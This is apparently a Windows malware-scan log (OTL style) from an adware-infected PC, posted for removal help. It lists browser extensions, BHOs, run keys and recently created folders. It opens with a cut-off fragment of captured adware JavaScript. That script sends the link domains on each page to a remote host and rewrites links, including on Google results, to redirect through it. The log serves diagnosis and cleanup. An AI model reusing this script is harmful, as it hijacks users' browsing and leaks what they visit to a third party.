a=\"\",e,d,g,h,l,k=0;for(c=c.replace(/[^A-Za-z0-9\\+\\/\\=]/g,\"\");k<c.length;)e=b._keyStr.indexOf(c.charAt(k++)),d=b._keyStr.indexOf(c.charAt(k++)),h=b._keyStr.indexOf(c.charAt(k++)),l=b._keyStr.indexOf(c.charAt(k++)),e=e<<2|d>>4,d=(d&15)<<4|h>>2,g=(h&3)<<6|l,a+=String.fromCharCode(e),64!=h&&(a+=String.fromCharCode(d)),64!=l&&(a+=String.fromCharCode(g));return a=b._utf8_decode(a)};b._utf8_encode=function(a){a=a.replace(/\\r\\n/g, \"\\n\");for(var b=\"\",e=0;e<a.length;e++){var d=a.charCodeAt(e);128>d?b+=String.fromCharCode(d):(127<d&&2048>d?b+=String.fromCharCode(d>>6|192):(b+=String.fromCharCode(d>>12|224),b+=String.fromCharCode(d>>6&63|128)),b+=String.fromCharCode(d&63|128))}return b};b._utf8_decode=function(b){for(var a=\"\",e=0,d=c1=c2=0;e<b.length;)d=b.charCodeAt(e),128>d?(a+=String.fromCharCode(d),e++):191<d&&224>d?(c2=b.charCodeAt(e+1),a+=String.fromCharCode((d&31)<<6|c2&63),e+=2):(c2=b.charCodeAt(e+1),c3=b.charCodeAt(e+2), a+=String.fromCharCode((d&15)<<12|(c2&63)<<6|c3&63),e+=3);return a}};this.checkHostnameInArray=function(b,a){for(var f=0;f<a.length;f++)if(a[f].hostname==b)return!1;return!0};this.injectScript=function(a){var c=document.createElement(\"script\");c.id=\"__skl_script\";c.src=a;c.type=\"text/javascript\";document.getElementsByTagName(\"head\")[0].appendChild©};this.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}}; a.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(c,f,e,d,g){\"undefined\"==typeof d&&(d=window);d.addEventListener(c,f,e);g&&a.cache.push([c,f,e,d])}:window.attachEvent?function(c,f,e,d,g){\"undefined\"==typeof d&&(d=window);d[\"e\"+c+f]=f;d[c+f]=function(){d[\"e\"+c+f](window.event)};d.attachEvent(\"on\"+c,d[c+f]);g&&a.cache.push([c,f,e,d])}:function(){};a.remove=window.removeEventListener?function(a,b,e,d){\"undefined\"==typeof d&&(d=window);d.removeEventListener(a,b,e)}: window.detachEvent?function(a,b,e,d){\"undefined\"==typeof d&&(d=window);d.detachEvent(\"on\"+a,d[a+b]);d[a+b]=null;d[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var c=0;c<a.cache.length;c++)a.remove.apply(a,a.cache[c]);a.cache=[]}};a.randomLetters=function(){for(var a=\"\",c=0;3>c;c++)a+=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\".charAt(Math.floor(62*Math.random()));return a};a.getLinks=function(){a.allLinks=document.links;a.validOutput=[];var b=[];a.domains={};for(var c=0;c< a.allLinks.length;c++){var f=a.allLinks[c].hostname;f!==location.hostname&&\"\"!==a.allLinks[c].hostname&&(\"undefined\"==typeof a.domains[f]&&a.validOutput.push(a.allLinks[c]),b.push(f.replace(/www./,\"\")))}for(var e in a.domains)e=e.replace(/www./,\"\"),b.push(e);return b.toString()};a.storage=new function(){var b=this;b.valid=localStorage;b.set=function(c,f){b.valid&&localStorage.setItem(a.prefix+\"_\"+c,f)};b.get=function©{return b.valid?localStorage.getItem(a.prefix+\"_\"+c):!1};b.clear=function(){b.valid&& localStorage.clear()};b.remove=function©{b.valid&&localStorage.removeItem(a.prefix+c)}};a.handleGooLinks=function(b,c,f,e,d){var g=b.href;b.href=\"#\";b.setAttribute(\"data-yodat\",c);b.setAttribute(\"onmousedown\",\"\");a.events.add(\"click\",function(b){b=a.utils.base64.encode(g);b=a.randomLetters()+b+a.randomLetters();var c=this.getAttribute(\"data-yodat\");a.storage.set(c,a.now+a.interval);\"A\"==this.nodeName&&(location.href=\"//\"+a.hostname+\"?rd=\"+encodeURIComponent(a.utils.decodeHtml(e))+b+a.path+\"&fid=\"+ d) },!1,b,!1)};a.validInterval=function(b){b=a.storage.get(b);return null===b?!0:b?a.now>parseInt(b):!1};a.dcrypt=function(b){for(var c=[],f=0;f<b.length;f++){var e=b[f],e=e.substring(3),e=e.substring(0,e.length-3),e=a.utils.base64.decode(e);c.push(e)}return c};a.handleLinks=function(b){if(\"undefined\"==typeof a.validOutput||a.validOutput.length!==b.length)return!1;for(var c=0;c<a.validOutput.length;c++){var f=a.validOutput[c],e=b[c].split(\"^\")[1],d=b[c].split(\"^\")[0],g=f.hostname.replace(/www./,\"\"); if (5<d.length&&a.validInterval(g))if(a.google)a.handleGooLinks(f,g,b,d,e);else{var h=a.utils.base64.encode(f.href),h=a.randomLetters()+h+a.randomLetters();f.setAttribute(\"data-yodat\",g);f.setAttribute(\"data-yodatfid\",e);f.href=\"//\"+a.hostname+\"?rd=\"+encodeURIComponent(a.utils.decodeHtml(d))+h+a.path+\"&fid=\"+e;a.events.add(\"click\",function(b){if(\"A\"!==this.nodeName)return!1;b=this.getAttribute(\"data-yodat\");this.getAttribute(\"data-yodatfid\");if(!b)return!1;a.storage.set(b,a.now+a.interval)},!1,f,!1)}}}; a.isGoo=function(b){null===location.hostname.match(/www\\.google\\.[a-z,\\.]+$/)?(a.google=!1,b()):(a.count=0,a.check_tab=function(){var c=document.getElementById(\"hdtb_msb\");if(null==c||\"undefined\"==typeof c)a.count++,10>a.count?setTimeout(function(){a.check_tab()},1E3):(a.google=!1,b());else return a.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&(a.google=!0,b()),!1},a.check_tab())};a.handleGoogle=function(){a.google=!0;var b;a:{b=[\"#gbqfq\",'input[name=\"q\"]'];for(var c=0;c< b.length;c++)if(1<a.utils.query_selector_all(b[c]).length){b=a.utils.query_selector_all(b[c])[0];break a}b=void 0}a.searchInput=b};a.init=function(){a.linksStr=encodeURIComponent(a.getLinks());if(!a.linksStr)return!1;var b=\"//\"+a.hostname+\"/?domains=\"+a.linksStr+a.path;a.utils.isIE()?a.utils.addScript(b+\"&cb=__sklinks.handleLinks\"):a.utils.ajax.get(b,function(b){try{b=JSON.parse(b),a.response=JSON.parse(b),a.handleLinks(a.response)}catch(f){}})};a.isGoo(function(){a.init();a.google&&(a.handleGoogle(), a.searchInput&&a.events.add(\"keyup\",a.utils.throttle(a.init,3E3),!1,a.searchInput,!1))});\"undefined\"==typeof window.__sklinks&&(window.__sklinks=a)};})();(function(){void(0)})()");
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:29.0.1
FF - prefs.js..keyword.URL: "http://uk.search.yah...type=903578&p="
FF - user.js - File not found
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_13_0_0_214.dll File not found
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_214.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3508.0205: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.1.3: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files\AVAST Software\Avast\WebRep\FF [2014/05/04 16:54:43 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 29.0.1\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 29.0.1\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
 
[2014/05/06 14:05:31 | 000,000,000 | ---D | M] (No name found) -- C:\Users\paulj_000\AppData\Roaming\mozilla\Extensions
[2014/05/24 14:23:14 | 000,000,000 | ---D | M] (No name found) -- C:\Users\paulj_000\AppData\Roaming\mozilla\Firefox\Profiles\f7t4qr94.default\extensions
[2014/05/24 14:23:14 | 000,000,000 | ---D | M] (ddeaalPeaK) -- C:\Users\paulj_000\AppData\Roaming\mozilla\Firefox\Profiles\f7t4qr94.default\extensions\[email protected]
[2014/05/24 14:23:18 | 000,008,078 | ---- | M] () -- C:\Users\paulj_000\AppData\Roaming\mozilla\firefox\profiles\f7t4qr94.default\searchplugins\yahoo_ff.xml
[2014/06/01 21:48:54 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/06/01 21:48:54 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
========== Chrome  ==========
 
CHR - default_search_provider: Yahoo (Enabled)
CHR - default_search_provider: search_url = http://uk.search.yah...p={searchTerms}
CHR - default_search_provider: suggest_url = http://ff.search.yah...={searchTerms},
CHR - plugin: Error reading preferences file
CHR - Extension: Google Drive = C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: YouTube = C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Google Search = C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: avast! Online Security = C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki\9.0.2018.95_0\
CHR - Extension: Google Wallet = C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Gmail = C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\
 
O1 HOSTS File: ([2013/08/22 14:25:41 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:64bit: - BHO: (ExplorerBHO Class) - {449D0D6E-2412-4E61-B68F-1CB625CD9E52} - C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)
O2:64bit: - BHO: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
O2:64bit: - BHO: (Google Toolbar Helper) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
O2:64bit: - BHO: (toopbUyEr) - {DB458257-B25C-8DD6-DBA9-285ED6951694} - C:\ProgramData\toopbUyEr\zcaFkvf.x64.dll ()
O2:64bit: - BHO: (HP Network Check Helper) - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
O2:64bit: - BHO: (ClassicIEBHO Class) - {EA801577-E6AD-4BD5-8F71-4BE0154331A4} - C:\Program Files\Classic Shell\ClassicIEDLL_64.dll (IvoSoft)
O2 - BHO: (ExplorerBHO Class) - {449D0D6E-2412-4E61-B68F-1CB625CD9E52} - C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)
O2 - BHO: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O2 - BHO: (toopbUyEr) - {DB458257-B25C-8DD6-DBA9-285ED6951694} - C:\ProgramData\toopbUyEr\zcaFkvf.dll ()
O2 - BHO: (HP Network Check Helper) - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
O2 - BHO: (ClassicIEBHO Class) - {EA801577-E6AD-4BD5-8F71-4BE0154331A4} - C:\Program Files\Classic Shell\ClassicIEDLL_32.dll (IvoSoft)
O3:64bit: - HKLM\..\Toolbar: (Google Toolbar) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
O3:64bit: - HKLM\..\Toolbar: (Classic Explorer Bar) - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)
O3 - HKLM\..\Toolbar: (Classic Explorer Bar) - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)
O4:64bit: - HKLM..\Run: [Classic Start Menu] C:\Program Files\Classic Shell\ClassicStartMenu.exe (IvoSoft)
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [OPBHOBroker] C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe (Hewlett-Packard)
O4:64bit: - HKLM..\Run: [OPBHOBrokerDesktop] C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe (Hewlett-Packard)
O4:[b]64bit:
- HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4:[b]64bit:
- HKLM..\Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Realtek Semiconductor)
O4:[b]64bit:
- HKLM..\Run: [SimplePass] C:\Program Files\Hewlett-Packard\SimplePass\HPSmplPass.exe (Hewlett-Packard)
O4 - HKLM..\Run: [AvastUI.exe] C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software)
O4 - HKLM..\Run: [HPMessageService] C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe (Hewlett-Packard Development Company, L.P.)
O4 - HKLM..\Run: [Internet Helper Anti-phishing] C:\ProgramData\Internet Helper Anti-phishing\internetHelper_antiphishing.exe (Internet Helper)
O4 - HKLM..\Run: [YouCam Service] C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe (CyberLink Corp.)
O4 - HKCU..\Run: [SearchProtection] C:\Users\paulj_000\AppData\Roaming\Search Protection\SearchProtection.EXE (Spigot, Inc.)
O4 - HKCU..\Run: [uTorrent] C:\Users\paulj_000\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O9:[b]64bit:
- Extra Button: @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll,-103 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9:[b]64bit:
- Extra 'Tools' menuitem : @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll,-102 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9:[b]64bit:
- Extra 'Tools' menuitem : Classic IE Settings - {56753E59-AF1D-4FBA-9E15-31557124ADA2} - C:\Program Files\Classic Shell\ClassicIE_32.exe (IvoSoft)
O9 - Extra Button: @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-103 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9 - Extra 'Tools' menuitem : @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-102 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9 - Extra 'Tools' menuitem : Classic IE Settings - {56753E59-AF1D-4FBA-9E15-31557124ADA2} - C:\Program Files\Classic Shell\ClassicIE_32.exe (IvoSoft)
O10:[b]64bit:
- NameSpace_Catalog5\Catalog_Entries64\000000000008 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000008 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O13[b]64bit:
- gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{21A232F6-C67F-4E3C-9B63-1AE6C41AB7DE}: DhcpNameServer = 192.168.56.3
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{5EA2473D-69A1-482B-99A7-0380670FC039}: DhcpNameServer = 192.168.1.1
O18:[b]64bit:
- Protocol\Handler\wlpg - No CLSID value found
O20:[b]64bit:
- AppInit_DLLs: (C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll) - C:\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC64Loader.dll (Client Connect LTD)
O20 - AppInit_DLLs: (C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC32Loader.dll) - C:\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC32Loader.dll (Client Connect LTD)
O20:[b]64bit:
- HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit:
- HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:[b]64bit:
- Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:[b]64bit:
- SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:
- HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:
- HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:
- HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:
- HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/06/01 21:48:59 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Maintenance Service
[2014/06/01 21:48:47 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2014/06/01 09:03:13 | 000,000,000 | ---D | C] -- C:\ProgramData\374311380
[2014/06/01 09:03:01 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Programs
[2014/05/24 14:23:07 | 000,000,000 | ---D | C] -- C:\ProgramData\b809a102f4c41187
[2014/05/24 14:22:54 | 000,000,000 | ---D | C] -- C:\ProgramData\toopbUyEr
[2014/05/20 18:17:05 | 000,000,000 | ---D | C] -- C:\ProgramData\{18165758-115C-4DC0-9EC2-FF89F725767F}
[2014/05/11 18:11:17 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\hpqlog
[2014/05/11 18:11:08 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Hewlett-Packard
[2014/05/10 22:35:30 | 000,000,000 | R--D | C] -- C:\Windows\BrowserChoice
[2014/05/10 18:23:42 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Google
[2014/05/10 08:40:58 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\Search Protection
[2014/05/10 08:39:52 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\uTorrent
[2014/05/09 16:52:42 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\MRT
[2014/05/06 17:06:05 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\ClassicShell
[2014/05/06 17:04:21 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\vlc
[2014/05/06 14:09:54 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\Macromedia
[2014/05/06 14:09:54 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Macromedia
[2014/05/06 14:05:06 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\Mozilla
[2014/05/06 14:05:06 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Mozilla
[2014/05/06 14:04:12 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\SkyDrive
[2014/05/06 14:04:10 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\Hewlett-Packard
[2014/05/06 14:01:42 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\antiphishing-internethelper
[2014/05/06 14:00:30 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\Documents\Youcam
[2014/05/06 14:00:23 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\CyberLink
[2014/05/06 13:59:42 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\AVAST Software
[2014/05/06 13:56:26 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Power2Go8
[2014/05/06 13:56:18 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
[2014/05/06 13:56:18 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Searches
[2014/05/06 13:56:18 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
[2014/05/06 13:56:17 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Contacts
[2014/05/06 13:56:14 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\Synaptics
[2014/05/06 13:56:03 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\Adobe
[2014/05/06 13:55:58 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\VirtualStore
[2014/05/06 13:55:54 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\SearchProtect
[2014/05/06 13:55:50 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Packages
[2014/05/06 13:55:42 | 000,000,000 | --SD | C] -- C:\Users\paulj_000\AppData\Roaming\Microsoft
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Videos
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Saved Games
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Pictures
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Music
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Links
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Favorites
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Downloads
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Documents
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\Desktop
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
[2014/05/06 13:55:42 | 000,000,000 | R--D | C] -- C:\Users\paulj_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
[2014/05/06 13:55:42 | 000,000,000 | -H-D | C] -- C:\Users\paulj_000\Documents\hp.system.package.metadata
[2014/05/06 13:55:42 | 000,000,000 | -H-D | C] -- C:\Users\paulj_000\Documents\hp.applications.package.appdata
[2014/05/06 13:55:42 | 000,000,000 | -H-D | C] -- C:\Users\paulj_000\AppData
[2014/05/06 13:55:42 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Temp
[2014/05/06 13:55:42 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Local\Microsoft
[2014/05/06 13:55:42 | 000,000,000 | ---D | C] -- C:\Users\paulj_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
[2014/05/04 17:34:27 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
[2014/05/04 17:32:37 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\VideoLAN
[2014/05/04 17:19:31 | 000,000,000 | ---D | C] -- C:\ProgramData\ClassicShell
[2014/05/04 17:18:06 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Classic Shell
[2014/05/04 17:18:06 | 000,000,000 | ---D | C] -- C:\Program Files\Classic Shell
[2014/05/04 16:58:36 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast
[2014/05/04 16:57:42 | 000,000,000 | ---D | C] -- C:\Program Files\Google
[2014/05/04 16:57:28 | 000,000,000 | ---D | C] -- C:\ProgramData\Google
[2014/05/04 16:57:13 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
[2014/05/04 16:56:08 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Google
[2014/05/04 16:55:37 | 000,085,328 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswstm.sys
[2014/05/04 16:55:36 | 001,039,096 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswsnx.sys.1400515085015
[2014/05/04 16:55:36 | 001,039,096 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswsnx.sys
[2014/05/04 16:55:36 | 000,423,240 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswsp.sys.1400515085015
[2014/05/04 16:55:36 | 000,423,240 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswsp.sys
[2014/05/04 16:55:36 | 000,093,568 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswRdr2.sys
[2014/05/04 16:55:36 | 000,079,184 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswMonFlt.sys
[2014/05/04 16:55:34 | 000,334,648 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\aswBoot.exe
[2014/05/04 16:54:16 | 000,043,152 | ---- | C] (AVAST Software) -- C:\Windows\avastSS.scr
[2014/05/04 16:52:27 | 000,000,000 | ---D | C] -- C:\Program Files\AVAST Software
[2014/05/04 16:51:38 | 000,000,000 | ---D | C] -- C:\ProgramData\CDB
[2014/05/04 16:51:04 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair
[2014/05/04 16:50:37 | 000,000,000 | ---D | C] -- C:\Program Files\Reimage
